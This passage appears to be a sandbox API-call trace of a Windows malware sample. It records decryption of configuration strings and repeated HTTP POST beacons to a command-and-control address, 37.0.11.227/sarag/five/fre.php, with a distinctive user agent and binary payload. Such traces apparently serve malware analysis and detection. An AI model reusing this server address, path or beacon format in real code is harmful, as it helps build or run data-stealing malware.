hHeap=0x690000) returned 1 [0247.024] GetProcessHeap () returned 0x690000 [0247.024] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0247.024] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1418) returned 0x6c0 [0247.026] Sleep (dwMilliseconds=0xea60) [0247.027] GetProcessHeap () returned 0x690000 [0247.027] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0247.028] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.030] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0247.035] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.035] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0247.043] GetProcessHeap () returned 0x690000 [0247.043] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0247.044] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.045] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfe8) returned 1 [0247.045] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.046] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0247.046] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.047] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0247.047] GetProcessHeap () returned 0x690000 [0247.048] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0247.049] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.049] CryptDecrypt (in: hKey=0x69cfe8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0247.050] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.050] CryptDestroyKey (hKey=0x69cfe8) returned 1 [0247.051] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.051] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0247.051] GetProcessHeap () returned 0x690000 [0247.051] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0247.058] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0247.058] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0247.059] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0247.059] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0247.060] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0247.060] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0247.061] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0247.061] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0247.061] GetProcessHeap () returned 0x690000 [0247.061] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0247.061] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0247.065] GetProcessHeap () returned 0x690000 [0247.065] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0247.065] GetProcessHeap () returned 0x690000 [0247.066] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0247.068] GetProcessHeap () returned 0x690000 [0247.068] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0247.068] GetProcessHeap () returned 0x690000 [0247.068] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0247.069] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.069] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0247.075] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.075] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0247.096] GetProcessHeap () returned 0x690000 [0247.096] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0247.097] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.097] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0247.098] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.098] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0247.098] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.099] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0247.101] GetProcessHeap () returned 0x690000 [0247.101] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0247.102] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.103] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0247.103] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.104] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0247.105] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.105] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0247.105] GetProcessHeap () returned 0x690000 [0247.105] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0247.106] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0247.106] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0247.107] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0247.107] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0247.108] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0247.108] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0247.111] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0247.112] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0247.112] GetProcessHeap () returned 0x690000 [0247.112] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0247.112] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0247.112] GetProcessHeap () returned 0x690000 [0247.112] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab480 [0247.112] socket (af=2, type=1, protocol=6) returned 0x6c4 [0247.112] connect (s=0x6c4, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0247.136] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0247.136] GetProcessHeap () returned 0x690000 [0247.136] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0247.137] GetProcessHeap () returned 0x690000 [0247.137] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0247.137] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0247.138] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0247.138] GetProcessHeap () returned 0x690000 [0247.138] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b01c0 [0247.138] GetProcessHeap () returned 0x690000 [0247.139] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0247.139] GetProcessHeap () returned 0x690000 [0247.139] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0247.139] GetProcessHeap () returned 0x690000 [0247.139] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0247.140] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0247.140] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0247.141] GetProcessHeap () returned 0x690000 [0247.141] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0247.141] GetProcessHeap () returned 0x690000 [0247.141] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0247.141] send (s=0x6c4, buf=0x6ad508*, len=242, flags=0) returned 242 [0247.142] send (s=0x6c4, buf=0x6aba40*, len=159, flags=0) returned 159 [0247.142] GetProcessHeap () returned 0x690000 [0247.142] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0247.142] recv (in: s=0x6c4, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0247.204] GetProcessHeap () returned 0x690000 [0247.205] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0247.205] GetProcessHeap () returned 0x690000 [0247.206] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0247.206] GetProcessHeap () returned 0x690000 [0247.206] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b01c0 | out: hHeap=0x690000) returned 1 [0247.206] GetProcessHeap () returned 0x690000 [0247.207] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0247.207] closesocket (s=0x6c4) returned 0 [0247.207] GetProcessHeap () returned 0x690000 [0247.207] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab480 | out: hHeap=0x690000) returned 1 [0247.207] GetProcessHeap () returned 0x690000 [0247.208] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0247.208] GetProcessHeap () returned 0x690000 [0247.208] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0247.208] GetProcessHeap () returned 0x690000 [0247.209] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0247.209] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x141c) returned 0x6c4 [0247.211] Sleep (dwMilliseconds=0xea60) [0247.213] GetProcessHeap () returned 0x690000 [0247.213] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0247.214] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.215] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0247.219] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.219] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0247.225] GetProcessHeap () returned 0x690000 [0247.225] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0247.226] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.227] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0247.228] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.228] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0247.229] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.231] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0247.231] GetProcessHeap () returned 0x690000 [0247.231] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0247.232] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.233] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0247.233] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.234] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0247.234] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.235] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0247.235] GetProcessHeap () returned 0x690000 [0247.235] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0247.235] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0247.236] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0247.236] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0247.237] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0247.237] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0247.237] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0247.238] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0247.238] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0247.238] GetProcessHeap () returned 0x690000 [0247.238] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0247.238] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0247.239] GetProcessHeap () returned 0x690000 [0247.239] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0247.242] GetProcessHeap () returned 0x690000 [0247.243] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0247.243] GetProcessHeap () returned 0x690000 [0247.243] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0247.243] GetProcessHeap () returned 0x690000 [0247.243] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0247.244] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.244] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0247.248] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.249] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0247.254] GetProcessHeap () returned 0x690000 [0247.254] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0247.255] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.255] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0247.256] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.256] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0247.256] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.257] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0247.257] GetProcessHeap () returned 0x690000 [0247.257] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0247.258] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.258] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0247.259] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.259] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0247.259] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.260] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0247.260] GetProcessHeap () returned 0x690000 [0247.260] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0247.260] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0247.261] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0247.261] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0247.261] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0247.262] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0247.262] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0247.263] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0247.263] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0247.263] GetProcessHeap () returned 0x690000 [0247.263] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0247.263] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0247.263] GetProcessHeap () returned 0x690000 [0247.263] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab420 [0247.263] socket (af=2, type=1, protocol=6) returned 0x6c8 [0247.264] connect (s=0x6c8, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0247.290] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0247.290] GetProcessHeap () returned 0x690000 [0247.290] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeff0 [0247.290] GetProcessHeap () returned 0x690000 [0247.290] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0247.291] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0247.291] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0247.291] GetProcessHeap () returned 0x690000 [0247.291] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af800 [0247.291] GetProcessHeap () returned 0x690000 [0247.292] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0247.293] GetProcessHeap () returned 0x690000 [0247.293] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0247.293] GetProcessHeap () returned 0x690000 [0247.293] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0247.293] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0247.294] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0247.294] GetProcessHeap () returned 0x690000 [0247.294] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0247.294] GetProcessHeap () returned 0x690000 [0247.295] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0247.295] send (s=0x6c8, buf=0x6ad508*, len=242, flags=0) returned 242 [0247.295] send (s=0x6c8, buf=0x6aba40*, len=159, flags=0) returned 159 [0247.295] GetProcessHeap () returned 0x690000 [0247.295] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0247.295] recv (in: s=0x6c8, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0247.367] GetProcessHeap () returned 0x690000 [0247.368] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0247.368] GetProcessHeap () returned 0x690000 [0247.368] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0247.369] GetProcessHeap () returned 0x690000 [0247.369] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af800 | out: hHeap=0x690000) returned 1 [0247.370] GetProcessHeap () returned 0x690000 [0247.370] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeff0 | out: hHeap=0x690000) returned 1 [0247.370] closesocket (s=0x6c8) returned 0 [0247.371] GetProcessHeap () returned 0x690000 [0247.371] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab420 | out: hHeap=0x690000) returned 1 [0247.371] GetProcessHeap () returned 0x690000 [0247.371] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0247.371] GetProcessHeap () returned 0x690000 [0247.372] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0247.372] GetProcessHeap () returned 0x690000 [0247.372] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0247.372] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1420) returned 0x6c8 [0247.375] Sleep (dwMilliseconds=0xea60) [0247.376] GetProcessHeap () returned 0x690000 [0247.376] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0247.377] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.378] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0247.386] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0247.387] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0247.393] GetProcessHeap () returned 0x690000 [0247.393] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0247.393] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 